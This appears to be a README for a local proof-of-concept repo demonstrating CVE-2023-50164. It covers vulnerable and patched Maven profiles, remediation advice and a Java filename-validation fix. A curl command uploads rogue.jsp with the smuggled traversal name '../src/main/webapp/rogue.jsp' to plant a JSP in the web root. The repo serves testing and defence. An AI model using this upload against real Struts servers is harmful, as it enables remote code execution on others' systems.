This is a Proof of Concept (PoC) for CVE-2023-50164, which outlines a new path traversal vulnerability which can lead to Remote Code Execution (RCE) in struts-core.
To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.
This repo builds off the excellent work of Henrik Plate found here.
There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.
To run with the RCE vuln, execute the following:

```shell
mvn clean jetty:run -P vuln
```

To run without the RCE vuln, execute the following:

```shell
mvn clean jetty:run -P no-vuln
```
The difference between the two profiles is that `vuln` uses `struts-core` version `6.3.0.1` (which has the path traversal vulnerability) and `no-vuln` uses `struts-core` version `6.3.0.2` (which does not have the path traversal vulnerability).
While running the `vuln` profile described above, execute the following:

```shell
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder, and you can browse to it at `http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a "Ya been PWNED!" message).
There is a code fix solution that works with the older Struts versions, but it is still highly advised to update your version of Struts.

To exercise the code fix, execute the following:

```shell
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll see an error message: `Attempted path traversal attack`
NOTE: If you use the `no-vuln` profile, you won't get an error message from the `/upload-no-vuln` endpoint, even if you use a relative path like `../src/main/webapp/rogue.jsp`, as the new version of `struts` automatically strips away relative path references.
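As an added illustration of the kind of check the code-fix endpoint performs (this is not the repo's own code; `SafeUploadAction`, its `uploadDir` and the reuse of the page's reject message are assumptions), a Struts-style action that accepts only a bare file name before resolving it under the upload directory:

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Hypothetical Struts-style upload action (not the repo's own code). Struts' file upload
// interceptor calls setUploadFileName() with the client-supplied name, so it is untrusted.
public class SafeUploadAction {
    private final Path uploadDir;      // directory uploads are allowed to land in
    private String uploadFileName;     // client-controlled value, exactly as received

    public SafeUploadAction(Path uploadDir) {
        this.uploadDir = uploadDir.toAbsolutePath().normalize();
    }

    public void setUploadFileName(String uploadFileName) {
        this.uploadFileName = uploadFileName;
    }

    // Returns where the upload may be written, or throws if the name would escape uploadDir.
    public Path resolveDestination() {
        if (uploadFileName == null || uploadFileName.isEmpty()) {
            throw new IllegalArgumentException("Missing upload file name");
        }
        // Treat both separator styles alike so "..\" is caught as well as "../".
        String name = uploadFileName.replace('\\', '/');
        // Only a bare file name is acceptable: no directory components, no "..", no NUL.
        if (name.contains("/") || name.contains("..") || name.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("Attempted path traversal attack");
        }
        Path dest = uploadDir.resolve(name).normalize();
        // Second check: the normalized result must still be a direct child of uploadDir.
        if (!uploadDir.equals(dest.getParent())) {
            throw new IllegalArgumentException("Attempted path traversal attack");
        }
        return dest;
    }

    public static void main(String[] args) {
        SafeUploadAction action = new SafeUploadAction(Paths.get("target", "uploads"));
        String[] candidates = {"report.pdf", "../src/main/webapp/rogue.jsp", "..\\rogue.jsp"};
        for (String candidate : candidates) {
            action.setUploadFileName(candidate);
            try {
                System.out.println(candidate + " -> accepted as " + action.resolveDestination());
            } catch (IllegalArgumentException e) {
                System.out.println(candidate + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

The first candidate is accepted and resolved under `target/uploads`; the two traversal names are rejected before any file is written.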